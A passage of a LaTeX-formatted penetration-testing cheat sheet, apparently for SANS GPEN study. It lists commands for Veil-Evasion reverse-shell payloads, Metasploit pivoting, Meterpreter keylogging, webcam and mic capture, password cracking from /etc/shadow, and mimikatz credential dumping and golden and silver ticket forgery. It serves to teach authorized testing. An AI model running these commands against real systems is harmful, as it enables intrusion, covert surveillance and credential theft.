`vulns -p 445` & Look for vulnerabilities based on port number \tn % Row Count 20 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Veil-Evasion}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Start Veil-Evasion}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`cd /opt/Veil-Evasion || /usr/share/veil`} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`./Veil-Evasion .py`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} `list` & get a list of all the different payloads that the tool can generate \tn % Row Count 8 (+ 4) % Row 5 \SetRowColor{white} `info \seqsplit{powershell/meterpreter/rev\_https`} & et more information about any of the payloads \tn % Row Count 11 (+ 3) % Row 6 \SetRowColor{LightBackground} `clean` & Clean out any leftover cruft from previous use of Veil-Evasion, \tn % Row Count 15 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Generate payload}}} \tn % Row Count 16 (+ 1) % Row 8 \SetRowColor{LightBackground} `use info \seqsplit{powershell/meterpreter/rev\_https`} & select the payload you want to generate \tn % Row Count 19 (+ 3) % Row 9 \SetRowColor{white} `options` & list options for actual item \tn % Row Count 21 (+ 2) % Row 10 \SetRowColor{LightBackground} `generate` & create the payload file \tn % Row Count 23 (+ 2) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Generated files}}} \tn % Row Count 24 (+ 1) % Row 12 \SetRowColor{LightBackground} `.bat` & This is the payload itself \tn % Row Count 26 (+ 2) % Row 13 \SetRowColor{white} `.rc` & This is the Metasploit configuration file (also known as a handler file) for a multi/handler waiting for a connection from our payload. \tn % Row Count 33 (+ 7) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Veil-Evasion (cont)}} \tn % Row 14 \SetRowColor{LightBackground} `exit` & exit Veil-Evasion \tn % Row Count 1 (+ 1) % Row 15 \SetRowColor{white} \seqsplit{`/usr/share/veil-output/source`} & Veil-Evasion output directory \tn % Row Count 3 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.16 cm} x{5.84 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{traceroute}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Options}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `-f {[}N{]}` & Set the initial TI'L for the first packet \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `-g {[}hostlist{]}` & Specify a loose source route (8 maximum hops) \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} `-I` & Use ICMP Echo Request instead of UDP \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} `-T` & Use TCP SYN instead of UDP (very useful!),with default dest port 80 \tn % Row Count 10 (+ 3) % Row 5 \SetRowColor{white} `-m {[}N{]}` & Set the maximum number of hops \tn % Row Count 12 (+ 2) % Row 6 \SetRowColor{LightBackground} `-n` & Print numbers instead of names \tn % Row Count 14 (+ 2) % Row 7 \SetRowColor{white} `-p {[}port{]}` & port \tn % Row Count 16 (+ 2) % Row 8 \SetRowColor{LightBackground} & For UDP, set the base destination UDP port and increment \tn % Row Count 18 (+ 2) % Row 9 \SetRowColor{white} & For TCP, set the fixed TCP destination port to use, defaulting to port 80 (no incrementing) \tn % Row Count 22 (+ 4) % Row 10 \SetRowColor{LightBackground} `-w {[}N{]}` & Wait for N seconds before giving up and writing * (default is 5) \tn % Row Count 25 (+ 3) % Row 11 \SetRowColor{white} `-4` & Force use of IPv4 (by default, chooses 4 or 6 based on dest addr) \tn % Row Count 28 (+ 3) % Row 12 \SetRowColor{LightBackground} `-6` & Force use of IPv6 \tn % Row Count 29 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} john.pot file & cracked password store \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} john.rec file & stores john's current status \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} john -{}-restore & picks up Where it left off based on the contents of the john.rec file \tn % Row Count 9 (+ 4) % Row 4 \SetRowColor{LightBackground} john -{}-test & Check Speed Of SyStem \tn % Row Count 11 (+ 2) % Row 5 \SetRowColor{white} john hash.txt & run john against hash.txt file \tn % Row Count 13 (+ 2) % Row 6 \SetRowColor{LightBackground} `john -{}-show {[}password\_file{]}` & compare which passwords John has already cracked froma given password file against itsjohn.pot file \tn % Row Count 18 (+ 5) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Cracking LANMAN Hashes}}} \tn % Row Count 19 (+ 1) % Row 8 \SetRowColor{LightBackground} `john /tmp/sam.txt` & By default, John will focus on the LANMAN hashes. \tn % Row Count 22 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Cracking Linux Passwords}}} \tn % Row Count 23 (+ 1) % Row 10 \SetRowColor{LightBackground} `cp /etc/passwd /tmp/passwd\_copy` & copy passwd file to your working directory \tn % Row Count 26 (+ 3) % Row 11 \SetRowColor{white} `cp /etc/shadow /tmp/shadow\_copy` & copy shadow file to your working directory \tn % Row Count 29 (+ 3) % Row 12 \SetRowColor{LightBackground} `./unshadow passwd\_copy shadow\_copy \textgreater{} combined.txt` & Use the `unshadow` script to combine account info from /etc/passwdwith password information from /etc/shadow \tn % Row Count 35 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper (cont)}} \tn % Row 13 \SetRowColor{LightBackground} john combined. txt & Run John against the combined file \tn % Row Count 2 (+ 2) % Row 14 \SetRowColor{white} cat \textasciitilde{}/.john/john.pot & Look at the Results in john.pot file \tn % Row Count 4 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.6 cm} x{6.4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{pw-inspector (Password Inspector)}} \tn % Row 0 \SetRowColor{LightBackground} -i & input file \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} -o & output file \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} -m {[}n{]} & the minimum number of characters to use for a password is n \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} -M {[}N{]} & Remove all words longer than N characters \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} -c {[}count{]} & how many password criteria a given word must meet to be included in the list. \tn % Row Count 9 (+ 3) % Row 5 \SetRowColor{white} -l & The password must contain at least one lowercase character. \tn % Row Count 11 (+ 2) % Row 6 \SetRowColor{LightBackground} -u & The Password must contain at least one uppercase character. (To specify a mixed case requirement, configure —c 2 -l —u.) \tn % Row Count 15 (+ 4) % Row 7 \SetRowColor{white} -n & The password must contain at least one number \tn % Row Count 17 (+ 2) % Row 8 \SetRowColor{LightBackground} -p & he password must contain at least one printable character that is neither alphabetic nor numeric, whichincludes !@\#\$\%"\&*(). \tn % Row Count 21 (+ 4) % Row 9 \SetRowColor{white} -s & The password must include characters not included in the other lists (such as nonprintable ASCII characters) \tn % Row Count 25 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Basic commands}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `? / help` & Display a help menu \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} `exit / quit` & Quit the Meterpreter \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} `sysinfo` & Show name, OS type \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} `shutdown / reboot` & Self—explanatory \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} `reg` & read or write to the Registry \tn % Row Count 7 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{File System Commands}}} \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} `cd` & Navigate directory structure \tn % Row Count 10 (+ 2) % Row 8 \SetRowColor{LightBackground} `lcd` & Change local directories on attacker machine \tn % Row Count 13 (+ 3) % Row 9 \SetRowColor{white} `pwd / getwd` & Show the current working directory \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} `ls` & List the directory contents, even 4 Windows \tn % Row Count 18 (+ 3) % Row 11 \SetRowColor{white} `cat` & Display a file's contents \tn % Row Count 20 (+ 2) % Row 12 \SetRowColor{LightBackground} `download / upload` & Move a file to or from the machine \tn % Row Count 22 (+ 2) % Row 13 \SetRowColor{white} `mkdir / rmdir` & Make or remove directories \tn % Row Count 24 (+ 2) % Row 14 \SetRowColor{LightBackground} `edit` & Edit a file using default editor \tn % Row Count 26 (+ 2) % Row 15 \SetRowColor{white} {\bf{Process Commands}} & 560.3 Page 92 \tn % Row Count 27 (+ 1) % Row 16 \SetRowColor{LightBackground} `getpid` & Returns the process ID that Meterpreter is running in \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 17 \SetRowColor{LightBackground} `getuid` & Returns the user ID that the Meterpreter is running with \tn % Row Count 3 (+ 3) % Row 18 \SetRowColor{white} `ps || ps -S notepad.exe` & Process list \tn % Row Count 5 (+ 2) % Row 19 \SetRowColor{LightBackground} `kill` & Terminate a process \tn % Row Count 6 (+ 1) % Row 20 \SetRowColor{white} `execute -f cmd.exe -c -H` & Runs a given program channelized (-c) and hide proccess window (-H) \tn % Row Count 10 (+ 4) % Row 21 \SetRowColor{LightBackground} `migrate {[}destination\_process\_ID{]}` & Jumps to a given destination process ID: \tn % Row Count 12 (+ 2) % Row 22 \SetRowColor{white} & *Target process must have the same or lesser privileges \tn % Row Count 15 (+ 3) % Row 23 \SetRowColor{LightBackground} & *May be a more stable process \tn % Row Count 17 (+ 2) % Row 24 \SetRowColor{white} & *When inside the process, can access any files that it has a lock on \tn % Row Count 21 (+ 4) % Row 25 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Network Commands}}} \tn % Row Count 22 (+ 1) % Row 26 \SetRowColor{white} `ipconfig` & show network config \tn % Row Count 23 (+ 1) % Row 27 \SetRowColor{LightBackground} `route` & Displays routing table, adds/deletes routes \tn % Row Count 26 (+ 3) % Row 28 \SetRowColor{white} `portfwd add -1 1111 -p 22 -r Target2` & SANS 560.3 Exploitation Page 67 for better understanding \tn % Row Count 29 (+ 3) % Row 29 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{On-target Machine commands}}} \tn % Row Count 30 (+ 1) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 30 \SetRowColor{LightBackground} `screenshot -p {[}file.jpg{]}` & SC \tn % Row Count 2 (+ 2) % Row 31 \SetRowColor{white} `idletime` & Show how long the user at the console has been idle \tn % Row Count 5 (+ 3) % Row 32 \SetRowColor{LightBackground} `uictl {[}enable/disable{]} {[}keyboard/mouse{]}` & Turn on or off user input devices \tn % Row Count 8 (+ 3) % Row 33 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Webcam and Mic Commands}}} \tn % Row Count 9 (+ 1) % Row 34 \SetRowColor{LightBackground} `webcam\_\_list` & Lists installed webcams \tn % Row Count 11 (+ 2) % Row 35 \SetRowColor{white} `webcam\_snap` & Snaps a single frame from the webcam as a JPEG: -Can specify JPEG image quality from 1 to 100, with a default of 50 \tn % Row Count 17 (+ 6) % Row 36 \SetRowColor{LightBackground} `record\_mic` & Records audio for N seconds (—d N) and stores in a wav filein the Metasploit .msf4 directory by default \tn % Row Count 23 (+ 6) % Row 37 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Make sure you get written permission before activating either feature} \tn % Row Count 25 (+ 2) % Row 38 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Keystroke Logger}}} \tn % Row Count 26 (+ 1) % Row 39 \SetRowColor{white} `keyscan\_start` & poll every 30 milliseconds for keystrokes entered into the system \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 40 \SetRowColor{LightBackground} `keyscan\_dump` & flushes 1 Megabyte of buffer keystrokes captured to attacker's Meterpreter Screen \tn % Row Count 5 (+ 5) % Row 41 \SetRowColor{white} `keyscan\_stop` & tells the Meterpreter to stop gathering all keystrokes \tn % Row Count 8 (+ 3) % Row 42 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Pivoting Using Metasploit's Route Command}}} \tn % Row Count 9 (+ 1) % Row 43 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use {[}exploit1{]}`} \tn % Row Count 10 (+ 1) % Row 44 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set RHOST {[}victim1{]}`} \tn % Row Count 11 (+ 1) % Row 45 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set PAYLOAD \seqsplit{windows/meterpreter/reverse\_tcp`}} \tn % Row Count 12 (+ 1) % Row 46 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`exploit`} \tn % Row Count 13 (+ 1) % Row 47 \SetRowColor{white} `CTRL-Z` & background session... {\bf{will display meterpreter sid}} \tn % Row Count 16 (+ 3) % Row 48 \SetRowColor{LightBackground} `route add {[}victim2\_subnet{]} {[}netmask{]} {[}Sid{]}` & direct any of its packets for a given target machine or subnet through that Meterpreter session \tn % Row Count 21 (+ 5) % Row 49 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use {[}exploit2{]}`} \tn % Row Count 22 (+ 1) % Row 50 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set RHOST {[}victim2{]}`} \tn % Row Count 23 (+ 1) % Row 51 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set PAYLOAD {[}payloadZ{]}`} \tn % Row Count 24 (+ 1) % Row 52 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`exploit`} \tn % Row Count 25 (+ 1) % Row 53 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Do not confuse the Metasploit (msf) route command with the Meterpreter route command. The latter is used to manage the routing tables on a target box that has been compromised using the Meterpreter payload. The msf route command is used to direct all traffic for a given target subnet from the attacker's Metasploit machine through a given Meterpreter session on a compromised victim machine to another potential Victim.} \tn % Row Count 34 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Meterpreter (cont)}} \tn % Row 54 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Additional Modules}}} \tn % Row Count 1 (+ 1) % Row 55 \SetRowColor{white} `use {[}modulename{]}` & load additional modules \tn % Row Count 3 (+ 2) % Row 56 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn % Row Count 4 (+ 1) % Row 57 \SetRowColor{white} `run schtasksabuse -c "{[}command1{]}{[},command2{]}..." -t {[}targetIP{]}` & script that automates Win-schtasks task creation \tn % Row Count 8 (+ 4) % Row 58 \SetRowColor{LightBackground} & Uses Meterpreter's process credentials (add -u and -p for other credentials) \tn % Row Count 12 (+ 4) % Row 59 \SetRowColor{white} load kiwi & oad the mimikatz Kiwi Meterpreter extension on the target machine \tn % Row Count 16 (+ 4) % Row 60 \SetRowColor{LightBackground} creds\_all & grab credentials \tn % Row Count 17 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.92 cm} x{2.08 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{GPG}} \tn % Row 0 \SetRowColor{LightBackground} `gpg -d -o \textless{}OutputFileName\textgreater{} \textless{}EncryptedFileName\textgreater{}` & decrypt a file \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{OVER-PASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{1. Peform the AS-REQ (encrypting timestamp with passw hash) to get an TGT} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{2. Perform TGS-REQ to KDC to get TGS} \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{3. Use TGS to impersonate passw hash owner and use a service} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Golden Ticket ATTACK}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Requirements}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `• KDC LT key` & (e.g. KRBTGT NTLM hash) \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`• Domain admin account name`} \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`• Domain name`} \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`• SID of domain admin account`} \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Commands}}} \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`.\textbackslash{}mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID \seqsplit{/krbtgt:KRBTGTPASSWORDHASH`}} \tn % Row Count 10 (+ 3) % Row 7 \SetRowColor{white} `.\textbackslash{}mimikatz kerberos::ptt file.txt` & create a golden ticket from file with PTT \tn % Row Count 12 (+ 2) % Row 8 \SetRowColor{LightBackground} `kerberos::tgt` & Get current session ticket details \tn % Row Count 14 (+ 2) % Row 9 \SetRowColor{white} `kerberos::list /export` & Export ticket to a .kirbi file \tn % Row Count 16 (+ 2) % Row 10 \SetRowColor{LightBackground} `kerberos::ptt file.kirbi` & Load / pass the ticket \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Silver Ticket ATTACK}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Requirements}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `• /target ` & target server's FQDN. \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `• /service ` & SPN \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} `• /rc4` & NTLM hash for the service (computer account or user account) \tn % Row Count 7 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Steps}}} \tn % Row Count 8 (+ 1) % Row 5 \SetRowColor{white} `whoami` & get domain/SID \tn % Row Count 9 (+ 1) % Row 6 \SetRowColor{LightBackground} \seqsplit{`invoke-Kerberoast.ps1`} & get SPN and Service user pass hash for cracking \tn % Row Count 12 (+ 3) % Row 7 \SetRowColor{white} `Mimikatz "privilege::debug" \seqsplit{"sekurlsa::logonpasswords"} exit` & get Service password hash w/Mimikatz (if you have access to server hosting Vuln service) \tn % Row Count 17 (+ 5) % Row 8 \SetRowColor{LightBackground} `hashcat \seqsplit{""\$krb5tgs\$6\$acct\$svc/HOST:port\$XXXX…XXX""} dicti.txt hashcat -m 13100 hash.txt dicti.txt` & Get unencrypted service password w/hashcat (If we didn't get NTLM hash) and hash it to NTLM \tn % Row Count 22 (+ 5) % Row 9 \SetRowColor{white} `Import-Module DSInternals \$pwd = \seqsplit{ConverTo-SecureString} 'P@\$\$w0rd' -AsPlainText -Force ConvertTo-NTHash \$pwd` & Hash cleartext password to NTLM \tn % Row Count 28 (+ 6) % Row 10 \SetRowColor{LightBackground} `mimikatz "kerberos::golden /admin:ImAdmin /id:1106 \seqsplit{/domain:lab.adsecurity.org} /sid:S-1-5-21-XXXXX \seqsplit{/target:EXCHANGE.lab.local} /rc4:NTLMHash /service:ServiceSPN /ptt" exit` & Forge TGS to auth target SVC \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Silver Ticket ATTACK (cont)}} \tn % Row 11 \SetRowColor{LightBackground} `misc::cmd ; klist ; use a command to connect to that specific service for example: \seqsplit{Find-InterestingFile} -Path \textbackslash{}\textbackslash{}FileServer1.domain.com\textbackslash{}S\$\textbackslash{}shares\textbackslash{} ` & Auth to local SVC w/creds and TGS | ej: mimikatz \tn % Row Count 8 (+ 8) % Row 12 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Trolling}}} \tn % Row Count 9 (+ 1) % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Faking RIDs} \tn % Row Count 10 (+ 1) % Row 14 \SetRowColor{white} 1106 is "Anakin" & /id:1159 \tn % Row Count 11 (+ 1) % Row 15 \SetRowColor{LightBackground} 1159 is "Vader" & /user:Anakin \tn % Row Count 12 (+ 1) % Row 16 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Result: User: Anakin | Real Context User: Vader} \tn % Row Count 13 (+ 1) % Row 17 \SetRowColor{LightBackground} `/groups:512,513,518,519 \{\{nl\}\}/id:9999 \{\{nl\}\}/user:yourmom` & lulz \tn % Row Count 16 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Command Reference for tickets attacks}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `/domain` & domain's fqdn \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} `/sid` & SID of the Domain \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} `/user /admin` & username to impersonate \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} `/groups` (optional) & group RIDs the user is a member of (the first is the primary group) default: 513,512,520,518,519 for the well-known Administrator's groups \tn % Row Count 10 (+ 6) % Row 5 \SetRowColor{white} `/ticket` (optional) & provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. \tn % Row Count 17 (+ 7) % Row 6 \SetRowColor{LightBackground} `/ptt` & as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. \tn % Row Count 22 (+ 5) % Row 7 \SetRowColor{white} `/id` (optional) & user RID. Mimikatz default is 500 (the default Admin account RID). \tn % Row Count 25 (+ 3) % Row 8 \SetRowColor{LightBackground} `/startoffset` (optional) & the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. \tn % Row Count 31 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz (cont)}} \tn % Row 9 \SetRowColor{LightBackground} `/endin` (optional) & ticket lifetime. Mimikatz Default value is 10 years (\textasciitilde{}5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). \tn % Row Count 7 (+ 7) % Row 10 \SetRowColor{white} `/renewmax` (optional) & maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (\textasciitilde{}5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). \tn % Row Count 15 (+ 8) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Scapy (Packet crafting)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{GPEN AIO Book - Lab 3-4: Scapy Introductory} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `scapy (as root)` & starts library \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \seqsplit{`help(function)`} & Get help for specific function \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} `p = \seqsplit{IP()/TCP()/"Foo"`} & define blank packet \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} `ls(p)` & show packet info \tn % Row Count 8 (+ 1) % Row 5 \SetRowColor{white} `p.show()` & show packet info \tn % Row Count 9 (+ 1) % Row 6 \SetRowColor{LightBackground} `summary` & show packet info \tn % Row Count 10 (+ 1) % Row 7 \SetRowColor{white} `ls(p{[}Raw{]})` & view just the data \tn % Row Count 11 (+ 1) % Row 8 \SetRowColor{LightBackground} `p{[}IP{]}.src="ipaddres"` & set src address \tn % Row Count 13 (+ 2) % Row 9 \SetRowColor{white} `p{[}IP{]}.dst="ipaddres"` & set dst address \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} `p{[}TCP{]}.sport="xx"` & set src port \tn % Row Count 17 (+ 2) % Row 11 \SetRowColor{white} `p{[}TCP{]}.dport="xx"` & set dst port \tn % Row Count 19 (+ 2) % Row 12 \SetRowColor{LightBackground} `p=IP/TCP/DATA` & packet structure \tn % Row Count 20 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{AIO Book - Page 158} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metadata Analysis}} \tn % Row 0 \SetRowColor{LightBackground} `./exiftool \seqsplit{t/images/ExifTool.jpg} \textgreater{}/root/exif.out` & execute exiftool against the ExifTool.jpg \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} strings —n 8 file.txt & shows strings only eight characters long \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Recon-ng comands for whois\_pocs}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`recon-ng`} \tn % Row Count 1 (+ 1) % Row 1 